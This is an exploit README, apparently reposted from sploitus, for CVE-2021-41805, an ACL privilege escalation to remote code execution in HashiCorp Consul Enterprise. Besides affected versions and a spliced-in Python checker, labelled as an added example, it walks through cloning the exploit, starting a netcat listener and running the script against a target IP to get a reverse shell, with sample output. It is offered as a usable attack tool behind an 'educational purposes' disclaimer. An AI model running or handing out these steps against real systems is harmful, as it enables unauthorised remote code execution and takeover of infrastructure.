## https://sploitus.com/exploit?id=011874D1-F225-538F-8A91-1655D62CE38F
# CVE-2021-41805 - HashiCorp Consul Enterprise RCE

> [!WARNING]
> LEGAL DISCLAIMER:
> This tool is STRICTLY for EDUCATIONAL PURPOSES ONLY!
> Usage of this tool for attacking targets without prior mutual consent is ILLEGAL.
> It is the user's responsibility to obey all laws that apply whilst using this tool.
> The developer of this tool assumes no liability and is not responsible for any misuse
> or damage caused by this program.

## About the CVE
An **ACL token** (with the default **operator:write** permissions) in one namespace can be used for unintended privilege escalation in a different namespace. This can be abused to gain **Remote Code Execution (RCE)** with escalated privileges.

## Affected Versions
- < 1.8.17
- 1.9.x < 1.9.11
- 1.10.x < 1.10.4
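
To check an inventory against the ranges above, the following added example (not part of the original repository) classifies version strings of the kind printed by `consul version`. It assumes Enterprise builds are marked with `+ent` build metadata; the function names and the sample inventory are constructed for illustration.

```python
import re

# Fixed release per release line, from the "Affected Versions" list above.
FIXED = {(1, 8): (1, 8, 17), (1, 9): (1, 9, 11), (1, 10): (1, 10, 4)}

_VERSION_RE = re.compile(
    r"v?(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.]+)?(?:\+([0-9A-Za-z.]+))?"
)


def parse(version_text):
    """Return ((major, minor, patch), is_prerelease, is_enterprise)."""
    m = _VERSION_RE.search(version_text)
    if m is None:
        raise ValueError(f"no version number in {version_text!r}")
    triple = tuple(int(part) for part in m.group(1, 2, 3))
    # Assumption: Enterprise builds carry "ent" in the build metadata (+ent).
    enterprise = "ent" in (m.group(5) or "").split(".")
    return triple, m.group(4) is not None, enterprise


def is_affected(version_text):
    """True if the version falls in a range the page lists as affected."""
    triple, prerelease, enterprise = parse(version_text)
    if not enterprise:
        return False  # the page title names Consul Enterprise only
    line = triple[:2]
    if line < (1, 8):
        return True  # "< 1.8.17" also covers every older release line
    fixed = FIXED.get(line)
    if fixed is None:
        return False  # newer release line, not in the page's list
    # A pre-release of the fixed version is treated as still affected.
    return triple < fixed or (triple == fixed and prerelease)


if __name__ == "__main__":
    # Constructed sample inventory: host name -> reported version string.
    inventory = {
        "consul-a": "Consul v1.9.5+ent",
        "consul-b": "Consul v1.10.4+ent",
        "consul-c": "Consul v1.8.16+ent",
    }
    for host, version in inventory.items():
        state = "AFFECTED" if is_affected(version) else "ok"
        print(f"{host}: {version} -> {state}")
```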

## Installing and Running the Script
- First, clone the repository:\
`git clone https://github.com/acfirthh/CVE-2021-41805.git`
- Change directory into the cloned repository:\
`cd CVE-2021-41805`
- Start a simple listener:\
`nc -nvlp <LISTENER_PORT>`
- Run the script:\
`python3 CVE-2021-41805.py -r <TARGET_IP> -rp <TARGET_PORT> -l <LISTENER_IP> -lp <LISTENER_PORT> [OPTIONAL: -t <ACL token> -v (verbose) -s (use SSL)]`

![Reverse Shell](images/reverse_shell.png)

## Expected Output
Running the exploit with the basic arguments **-r [TARGET_IP]**, **-rp [TARGET_PORT]**, **-l [LISTENER_IP]**, **-lp [LISTENER_PORT]** (and optionally **-t [ACL_TOKEN]** and **-s [Use SSL]**) gives basic output like:
```
[*] The PUT request was made successfully. Check your listener...
```

Running the exploit with the basic arguments plus **-v [VERBOSE]** will give verbose output:\
![Verbose Output](images/verbose_output.png)

If an error occurs when the exploit is run and the **-v** argument is specified, the output will be something like:\
![Verbose Output with Error](images/verbose_output_error.png)